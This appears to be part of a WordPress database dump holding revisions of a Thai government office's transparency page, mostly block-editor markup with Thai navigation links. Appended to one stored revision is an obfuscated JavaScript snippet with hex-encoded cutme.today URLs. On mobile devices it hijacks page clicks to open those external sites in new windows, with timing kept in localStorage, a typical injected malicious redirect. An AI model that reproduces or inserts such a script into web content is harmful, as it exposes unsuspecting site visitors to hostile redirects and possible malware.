kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-20 11:23:02','2024-08-20 04:23:02','',871,'http://pakhaeng.ssk.in.th/?p=894',0,'revision','',0),
(896,1,'2024-08-20 11:24:11','2024-08-20 04:24:11','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":5,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-5 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span 